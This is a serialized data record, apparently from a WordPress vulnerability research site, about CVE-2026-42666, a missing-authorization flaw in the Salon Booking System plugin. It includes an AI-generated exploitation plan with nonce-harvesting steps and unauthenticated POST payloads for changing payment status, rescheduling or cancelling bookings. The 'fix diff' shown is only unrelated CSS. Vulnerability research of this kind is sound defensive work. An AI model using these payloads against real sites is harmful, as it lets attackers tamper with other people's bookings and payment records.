[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fjcSCLeRJprKvb2bXrkunOd9NVXSjW64MHCWb_VeBJvE":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":34,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":40},"CVE-2026-42666","salon-booking-system-free-version-missing-authorization","Salon Booking System – Free Version \u003C= 10.30.25 - Missing Authorization","The Salon Booking System – Free Version plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 10.30.25. This makes it possible for unauthenticated attackers to perform an unauthorized action.","salon-booking-system",null,"\u003C=10.30.25","10.30.26","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-05-10 00:00:00","2026-05-19 13:19:07",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F98719f12-d100-4f72-a8fa-61205a24784d?source=api-prod",10,[22,23,24,25,26,27,28],"css\u002Fadmin.css","css\u002Fsalon.css","js\u002Fadmin\u002FadminServiceEdit.js","js\u002Fadmin\u002FcustomBookingUser.js","js\u002Fcalendar.js","js\u002Fdiscount\u002Fsalon-discount.js","js\u002Fsalon-my-account.js","researched",false,3,"This research plan outlines the steps to exploit **CVE-2026-42666**, a Missing Authorization vulnerability in the Salon Booking System plugin. \n\nThe vulnerability likely resides in a central AJAX dispatcher (action `salon`) where specific methods, such as `refreshPaymentStatus`, fail to implement capability checks, allowing unauthenticated users to modify booking states.\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Missing Authorization (Missing Capability Check).\n*   **Affected Action:** `wp_ajax_salon` and `wp_ajax_nopriv_salon`.\n*   **Vulnerable Component:** The internal AJAX handler for the `salon` action, specifically the `refreshPaymentStatus` method (and potentially others like `rescheduleBooking`).\n*   **Reason:** The plugin uses a single AJAX entry point and routes requests to methods based on a `method` parameter. While some methods may require a nonce, the plugin fails to verify if the requester has the appropriate permissions (e.g., `current_user_can('manage_options')`) before executing privileged actions.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Authentication:** Unauthenticated (leveraging `wp_ajax_nopriv_salon`).\n*   **Action:** `salon`\n*   **Payload Parameters:**\n    *   `action`: `salon`\n    *   `method`: `refreshPaymentStatus` (Target method identified in `js\u002Fadmin\u002FcustomBookingUser.js`)\n    *   `booking_id`: The ID of the booking to target.\n    *   `nonce`: A valid WordPress nonce for the `salon` action.\n*   **Preconditions:** A booking must exist in the system.\n\n### 3. Code Flow\n1.  **Entry Point:** The attacker sends a POST request to `admin-ajax.php` with `action=salon`.\n2.  **Dispatcher:** The plugin's AJAX handler (likely in `src\u002FSLN\u002FAction\u002FAjax.php` or similar) receives the request.\n3.  **Method Routing:** The handler reads `$_POST['method']` (e.g., `\"refreshPaymentStatus\"`).\n4.  **Security Check (Weak):** The handler may check a nonce using `check_ajax_referer('salon', 'security')` or `wp_verify_nonce($_POST['nonce'], 'salon')`. \n5.  **Authorization Failure:** The code proceeds to call the target method without checking `current_user_can()`.\n6.  **Sink:** The `refreshPaymentStatus` method executes, communicating with external gateways (Stripe\u002FPayPal) and updating the `_sln_payment_status` meta or internal database state.\n\n### 4. Nonce Acquisition Strategy\nThe plugin enqueues a `salon` object in the frontend containing the necessary nonce.\n\n1.  **Identify Shortcode:** The plugin uses `[salonbooking]` to display the booking form.\n2.  **Create Page:** Create a public page containing this shortcode to ensure the scripts and nonces are loaded.\n3.  **Navigate:** Use `browser_navigate` to visit the page.\n4.  **Extract Nonce:** Use `browser_eval` to extract the nonce from the global `salon` object.\n    *   **JS Variable:** `window.salon`\n    *   **Nonce Key:** `ajax_nonce`\n    *   **Command:** `browser_eval(\"window.salon?.ajax_nonce\")`\n\n### 5. Exploitation Strategy\n1.  **Preparation:** Create a service and a test booking to obtain a valid `booking_id`.\n2.  **Nonce Harvest:** Extract the `ajax_nonce` using the browser tool.\n3.  **Execution:** Use `http_request` to trigger the `refreshPaymentStatus` method.\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Method:** `POST`\n    *   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n    *   **Body:** \n        ```\n        action=salon&method=refreshPaymentStatus&booking_id=[BOOKING_ID]&nonce=[NONCE]\n        ```\n4.  **Alternative Method:** If `refreshPaymentStatus` is restricted, attempt `rescheduleBooking` which is also part of the `salon` action (identified in `js\u002Fsalon-my-account.js`).\n    *   **Body:**\n        ```\n        action=salon&method=rescheduleBooking&_sln_booking_id=[BOOKING_ID]&_sln_booking_date=2026-01-01&_sln_booking_time=10:00&nonce=[NONCE]\n        ```\n\n### 6. Test Data Setup\n1.  **Create Service:**\n    ```bash\n    wp post create --post_type=sln_service --post_title=\"Audit Service\" --post_status=publish\n    ```\n2.  **Create Booking:**\n    ```bash\n    # Use the plugin's internal meta to simulate a booking\n    wp post create --post_type=sln_booking --post_title=\"Target Booking\" --post_status=publish\n    ```\n3.  **Setup Nonce Page:**\n    ```bash\n    wp post create --post_type=page --post_title=\"Booking Page\" --post_content='[salonbooking]' --post_status=publish\n    ```\n\n### 7. Expected Results\n*   The server returns a JSON response (e.g., `{\"success\": true, \"message\": \"...\"}`).\n*   The booking's internal state or \"Payment Status\" is updated in the database.\n*   No \"403 Forbidden\" or \"Insufficient Permissions\" errors are returned, despite the request being unauthenticated.\n\n### 8. Verification Steps\n1.  **Check Booking Meta:** Verify if the payment status or modified date changed.\n    ```bash\n    wp post meta list [BOOKING_ID]\n    ```\n2.  **Check Status:** Observe the post status or specific Salon-specific meta keys (e.g., `_sln_payment_status`).\n    ```bash\n    wp post get [BOOKING_ID] --field=post_modified\n    ```\n\n### 9. Alternative Approaches\n*   **Action `salon_discount`:** Attempt the same pattern with `action=salon_discount` and `method=applyDiscountCode` (from `js\u002Fdiscount\u002Fsalon-discount.js`).\n*   **Action `salon` + `method=cancelBooking`:** If the CVSS `A:N` (No Availability impact) is inaccurate in the report, this is a likely high-impact alternative.\n    *   **Payload:** `action=salon&method=cancelBooking&id=[BOOKING_ID]&security=[NONCE]` (Note the parameter name change to `security` based on `js\u002Fsalon-my-account.js` line 34).","The Salon Booking System plugin (Free Version) fails to implement capability checks in its central AJAX dispatcher for the 'salon' and 'salon_discount' actions. This allows unauthenticated attackers to perform privileged operations, such as refreshing payment statuses, rescheduling bookings, or applying discounts, by obtaining a valid nonce from the frontend and targeting specific booking IDs.","\u002F\u002F js\u002Fadmin\u002FcustomBookingUser.js lines 45-54\n\t\t$.ajax({\n\t\t\turl:      ajaxurl,\n\t\t\tmethod:   \"POST\",\n\t\t\tdataType: \"json\",\n\t\t\ttimeout:  30000,\n\t\t\tdata: {\n\t\t\t\taction:     \"salon\",\n\t\t\t\tmethod:     \"refreshPaymentStatus\",\n\t\t\t\tbooking_id: bookingId,\n\t\t\t\tnonce:      nonce,\n\t\t\t},\n\n---\n\n\u002F\u002F js\u002Fdiscount\u002Fsalon-discount.js lines 56-60\n    var data =\n        \"sln[discount]=\" +\n        code +\n        \"&action=salon_discount&method=applyDiscountCode&security=\" +\n        salon.ajax_nonce;","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsalon-booking-system\u002F10.30.23\u002Fcss\u002Fadmin.css \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsalon-booking-system\u002F10.30.26\u002Fcss\u002Fadmin.css\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsalon-booking-system\u002F10.30.23\u002Fcss\u002Fadmin.css\t2026-03-24 15:29:24.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fsalon-booking-system\u002F10.30.26\u002Fcss\u002Fadmin.css\t2026-04-21 18:43:56.000000000 +0000\n@@ -23814,6 +23814,32 @@\n     margin-top: 16px;\n   }\n }\n+.sln-calendar-carousel__illustration--number {\n+  flex-direction: column;\n+  gap: 10px;\n+  text-align: center;\n+}\n+.sln-calendar-carousel__number {\n+  display: flex;\n+  flex-direction: column;\n+  align-items: center;\n+  gap: 6px;\n+}\n+.sln-calendar-carousel__number-text {\n+  font-size: 3.5rem;\n+  font-weight: 800;\n+  color: #fdcb50;\n+  line-height: 1;\n+  letter-spacing: -1px;\n+}\n+.sln-calendar-carousel__number-label {\n+  margin: 0;\n+  font-size: 13px;\n+  font-weight: 600;\n+  color: rgba(255, 255, 255, 0.85);\n+  text-transform: uppercase;\n+  letter-spacing: 0.5px;\n+}\n @media (max-width: 640px) {\n   .sln-calendar-carousel {\n     padding: 24px 20px;","The exploit targets the WordPress AJAX endpoint (\u002Fwp-admin\u002Fadmin-ajax.php) using the 'salon' or 'salon_discount' actions. An attacker first obtains a valid AJAX nonce by visiting any public page where the [salonbooking] shortcode is present and extracting the 'ajax_nonce' value from the global 'window.salon' JavaScript object. With this nonce, the attacker sends an unauthenticated POST request to the AJAX endpoint with the 'method' parameter set to 'refreshPaymentStatus', 'rescheduleBooking', or 'cancelBooking'. By providing a target 'booking_id', the attacker can manipulate the state of bookings or payment metadata because the plugin does not verify if the user has the 'manage_options' or equivalent capability before executing the requested method.","gemini-3-flash-preview","2026-05-20 19:01:48","2026-05-20 19:02:47",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","10.30.23","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsalon-booking-system\u002Ftags\u002F10.30.23","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsalon-booking-system.10.30.23.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsalon-booking-system\u002Ftags\u002F10.30.26","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsalon-booking-system.10.30.26.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsalon-booking-system\u002Ftags"]